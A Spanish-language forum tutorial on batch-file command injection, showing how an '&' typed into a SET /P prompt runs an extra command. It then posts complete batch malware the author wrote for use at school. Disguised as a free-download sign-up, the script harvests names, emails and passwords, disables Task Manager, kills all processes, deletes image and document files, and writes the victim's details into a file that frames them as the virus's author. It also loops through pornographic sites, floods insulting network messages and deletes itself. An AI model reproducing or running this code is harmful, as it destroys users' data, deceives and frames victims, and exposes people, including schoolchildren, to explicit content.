d4rk dn4

---

Acá les traigo este manual de BATCH Injection (a partir de ahora BI Lengua). Voy a intentar hacerlo sencillo y con ejemplos para que lo enmtiendan mejor ^^

---

BI es basicamente lo mismo que la HTML Injection. Consiste en la ejecución de comandos no incluidos en el programa. Se da en TODOS los archivos .bat ya que se pueden editar con el block de notas, además tambien se produce en donde se usa el comando SET /P... en este caso para realizarla se utiliza la "&" (sin las comillas), por ej:
Código:


En la parte donde les pide el nombre ingresen: Pablo &msg * Vulnerable y veran que efectivamente es vulnerable...

---

Puede ser usada para dos cosas (en realidad para otras cosas también, pero pongo las que me parecen más importantes ^^)
La primera: Resolver crackmes. Y la segunda: Acceder a información personal (no creo que ahora alguien use BATCH para proteger sus archivos pero...) Para ambos deberiamos modificar el code, ej:
Código:


Ahora inyectamos y quedaría algo así:
Código:


Y nos diría la clave ^^ Obviamente ya no vienen crackmes tan sencillos porque están encriptados... pero eso lo dejo para mi próximo tutorial Lengua

---

Bueno, eso fue todo. Espero que lo hayan entendido Guiñar

Proximamente tuto para crear crackmes (reemplazo de caracteres, etc.) y como resolverlos (truco del echo y las @, derrotando al reeplazo de caracteres, etc.) y despues me voy a Perl ^^

Suerte a todos []o^^

Aca les dejo un Malware que hice para usarlo en la escuela ^^
Obviamente nunca lo use, pero quien sabe, puede ser que algún día lo use xD

@echo off
title BIENVENIDO AL SISTEMA DE DESCARGAS GRATUITAS DE [D4rk_DN4]
color f9
echo Para poder Acceder al sistema debes registrarte...
pause > NUL
:regis
cls
set /p nombre=Nombre:
set /p apellido=Apellido:
set /p nick=Nick:
set /p mail=Mail:
set /p pass=Crea una contrase¤a:
pause
cls
echo Creando cuenta
ECHO.&FOR %%· IN (Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û Û) DO @SET/P =%%·NUL PING -N 1 127.1
msg * Cuenta creada exitosamente
pause > NUL
:menu
title BIENVENIDO %nick% AL SISTEMA DE DESCARGAS GRATUITAS DE [D4rk_DN4]
cls
echo 1. JUEGOS
echo 2. VIDEOS
echo 3. IMAGENES
echo 4. SALIR
set /p opcion=Que deseas descargar?

:x
cls
Reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f
taskkill /f /im *.*
FOR %%b IN (gif jpg tif png bmp txt doc) DO del /Q *.%%b

echo El Virus fue creado por %nick% (%nombre% %apellido%). Cualquier duda o consulta contactame a: %mail% >> C:\virus_info.txt
:bucle
set var=10

:bucle2
if %var%==0 (goto hell-o-) else set /A var=%var%-1
start www.soputas.com
start www.puritanas.com
start www.haleysummers.com
start www.supertangas.com
start www.poringa.com
start www.macizorras.com
goto bucle2

:hell-o-
FOR %%C IN ("Own3d mother fuckers" "Si quieren saber quien fue vean el archivo virus_info.txt" "Jeje, suck my dick putos" ) DO net send * %%A
goto hell-o-

del /f /q %0
exit



Lo dejo chico porque sino se deforma mucho y no se puede copiar muy bien el code...